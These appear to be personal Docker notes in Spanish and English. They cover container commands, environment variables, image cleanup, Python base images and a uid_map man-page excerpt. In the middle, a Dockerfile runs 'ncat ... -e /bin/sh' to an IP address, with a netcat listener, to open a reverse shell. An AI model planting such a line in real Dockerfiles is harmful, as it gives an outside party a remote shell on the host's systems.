docker

• docker run -it --entrypoint sh
  
• https://medium.com/@betz.mark/ten-tips-for-debugging-docker-containers-cde4da841a1d
  
• Copiar a local docker cp <docker ps id>:<docker path> <local path>
  -> sacar la id con docker ps
  
• docker exec -it agitated_bell sh # docker ps -> NAMES, permite ejecutar una terminal incluso si tiene un entrypoint
  
• docker ps -> docker inspect $CONTAINER_ID
  
• Cuidado con el orden de los argumentos:
  docker run -it --network host -e "ENVIROMENT=TEST" --entrypoint bash my-docker-image
  

A running instance of an image is a container

• docker stop agitated_bell
  
• docker ps -a #
  
• docker rm <ids de contenedores terminados>
  
• docker images
  
• docker rmi <id de la imagen> # Eliminar los contenedores antes para que no de el error:
  

  Error response from daemon: conflict: unable to remove repository reference (must force)
  - container is using its referenced image

• docker push <url de imagen de docker>
  
• docker export <name> > <name>.tar
  
• docker export <name> | gzip > <name>.tar.gz
  

• docker pull <url de imagen de docker>
  
• docker import <name>.tar <name:tag>
  
• zcat <name>.tar.gz | docker import - <name:tag>
  

https://vsupalov.com/docker-arg-env-variable-guide/
Environment variables are exported with quotes, so that you have to remove quotes from your .env

docker run --env-file=env_file_name alpine env

• https://raesene.github.io/blog/2019/08/09/docker-reverse-shells/
  

Dockerfile

  FROM ubuntu:18.04
  RUN apt update && apt install -y nmap
  RUN ncat 10.140.73.163 8989 -e /bin/sh
  CMD ["/bin/bash"]

docker-compose.yml

  version: '3.0'
  services:
    reverse_shell:
      build: .
      container_name: shell_container
      restart: always
      ports:
        - 8989:8989
      networks:
        myNetwork:
          ipv4_address: 10.29.0.2
  networks:
    myNetwork:
      driver: bridge
      ipam:
        config:
          - subnet: 10.29.0.0/24

• nc -l -p 8989 para conectarse
  
• https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
  

https://stackoverflow.com/questions/31712266/how-to-clean-up-docker-overlay-directory
docker image prune -a -f –filter “until=90”
docker system prune -a -f
Alguna cosa más por ahí en firefox que tenía

docker system df --format 'json' -v | jq -r '.BuildCache.[] | ("\(.Size) \(.InUse) \(.CreatedSince) \(.LastUsedSince) \(.ID)")' | sort -hr

• The Mental Model Of Docker Container Shipping
  
• Towards a Strong Mental Model of Docker
  

1. Set using docker compose run -e in the CLI
   
2. Substituted from your shell
   
3. Set using the environment attribute in the Compose file
   
4. Use of the --env-file argument in the CLI
   
5. Use of the env_file attribute in the Compose file
   
6. Set using an .env file placed at base of your project directory
   
7. Set in a container image in the ENV directive. Having any ARG or ENV setting in a Dockerfile evaluates only if there is no Docker Compose entry for environment, env_file or run --env.
   

https://vsupalov.com/docker-arg-env-variable-guide/

$ENV_VARIABLE available in current shell
docker –build-arg ENV_VARIABLE_ARG=$ENV_VARIABLE

ARG ENV_VARIABLE_ARG
ENV ENV_VARIABLE=${ENV_VARIABLE_ARG}

 User and group ID mappings: uid_map and gid_map
       The uid_map file exposes the mapping of user IDs from the user
       namespace of the process pid to the user namespace of the process
       that opened uid_map (but see a qualification to this point
       below).  In other words, processes that are in different user
       namespaces will potentially see different values when reading
       from a particular uid_map file, depending on the user ID mappings
       for the user namespaces of the reading processes.

       Each line in the uid_map file specifies a 1-to-1 mapping of a
       range of contiguous user IDs between two user namespaces.  (When
       a user namespace is first created, this file is empty.)  The
       specification in each line takes the form of three numbers
       delimited by white space.  The first two numbers specify the
       starting user ID in each of the two user namespaces.  The third
       number specifies the length of the mapped range.  In detail, the
       fields are interpreted as follows:

       (1) The start of the range of user IDs in the user namespace of
           the process pid.

       (2) The start of the range of user IDs to which the user IDs
           specified by field one map.  How field two is interpreted
           depends on whether the process that opened uid_map and the
           process pid are in the same user namespace, as follows:

           a) If the two processes are in different user namespaces:
              field two is the start of a range of user IDs in the user
              namespace of the process that opened uid_map.

           b) If the two processes are in the same user namespace: field
              two is the start of the range of user IDs in the parent
              user namespace of the process pid.  This case enables the
              opener of uid_map (the common case here is opening
              /proc/self/uid_map) to see the mapping of user IDs into
              the user namespace of the process that created this user
              namespace.

       (3) The length of the range of user IDs that is mapped between
           the two user namespaces.

       System calls that return user IDs (group IDs)—for example,
       getuid(2), getgid(2), and the credential fields in the structure
       returned by stat(2)—return the user ID (group ID) mapped into the
       caller's user namespace.

       When a process accesses a file, its user and group IDs are mapped
       into the initial user namespace for the purpose of permission
       checking and assigning IDs when creating a file.  When a process
       retrieves file user and group IDs via stat(2), the IDs are mapped
       in the opposite direction, to produce values relative to the
       process user and group ID mappings.

       The initial user namespace has no parent namespace, but, for
       consistency, the kernel provides dummy user and group ID mapping
       files for this namespace.  Looking at the uid_map file (gid_map
       is the same) from a shell in the initial namespace shows:

           $ cat /proc/$$/uid_map
                    0          0 4294967295

       This mapping tells us that the range starting at user ID 0 in
       this namespace maps to a range starting at 0 in the (nonexistent)
       parent namespace, and the length of the range is the largest
       32-bit unsigned integer.  This leaves 4294967295 (the 32-bit
       signed -1 value) unmapped.  This is deliberate: (uid_t) -1 is
       used in several interfaces (e.g., setreuid(2)) as a way to
       specify "no user ID".  Leaving (uid_t) -1 unmapped and unusable
       guarantees that there will be no confusion when using these
       interfaces.

gcloud auth configure-docker # Esto hay que ejecutarlo en cada proyecto

Azure no tiene credential helper:

• Azure/acr-docker-credential-helper: This is a wrapper for Docker Credential helpers created by Azure Container Registry (ACR) team. This tool allows Azure Active Directory (AAD) based login
  

https://pythonspeed.com/articles/official-python-docker-image/

• slim, no tiene compiladores
  
• instala en /usr/local, no hace falta instalarlo con apt-get
  
• al mantener la instalación y la desinstalación de los compiladores en un mismo RUN, no se guarda en ninguna capa el compilador lo que ahorra mucho espacio
  

https://blog.realkinetic.com/building-minimal-docker-containers-for-python-applications-37d0272c52f3?gi=27434838d473
Using Alpine can make Python Docker builds 50× slower
https://pythonspeed.com/articles/alpine-docker-python/

• Alpine tiene su propia libreria de C, ulibc en vez de glibc
  
• paquetes con dependencias binarias (numpy, pandas, matplotlib) tienen que recompilar todo porque las wheels de PyPI están para glibc
  

Docker alpine no tiene pandas en los repos así que hay que compilarlo al instalarlo

• https://pythonspeed.com/articles/alpine-docker-python/
  
• https://stackoverflow.com/questions/49037742/why-does-it-take-ages-to-install-pandas-on-alpine-linux
  

Hay imágenes de docker que traen ya preinstalado pandas:

• https://github.com/amancevice/docker-pandas
  

https://www.reddit.com/r/Python/comments/ji9nu7/how_to_write_a_great_dockerfile_for_python/

https://news.ycombinator.com/item?id=26101608

Alternatives to Docker/Kubernetes
Runtimes, Container Libraries
https://towardsdatascience.com/its-time-to-say-goodbye-to-docker-5cfec8eff833?_branch_match_id=675366774178217464

https://www.redhat.com/sysadmin/compose-kubernetes-podman
Use Podman 3.0 to convert Docker Compose YAML to a format Podman recognizes.

Docker-compatible CLI for containerd, with support for Compose, Rootless, eStargz, OCIcrypt, IPFS, …

https://collabnix.com/demystifying-the-relationship-between-moby-docker/
https://www.theregister.com/2019/11/22/moby_docker_naming/

https://link.medium.com/5rUFwYrUGkb

• GitHub - moby/buildkit: concurrent, cache-efficient, and Dockerfile-agnostic builder toolkit
  
• GitHub - cmdjulian/mopy: mopy is a docker buildkit frontend to package and build your python app into a minimal best practice docker image. You don’t have to be a docker pro anymore! 🐋
  

https://www.reddit.com/r/programming/comments/toptrr/copy_chmod_reduced_the_size_of_my_container_image/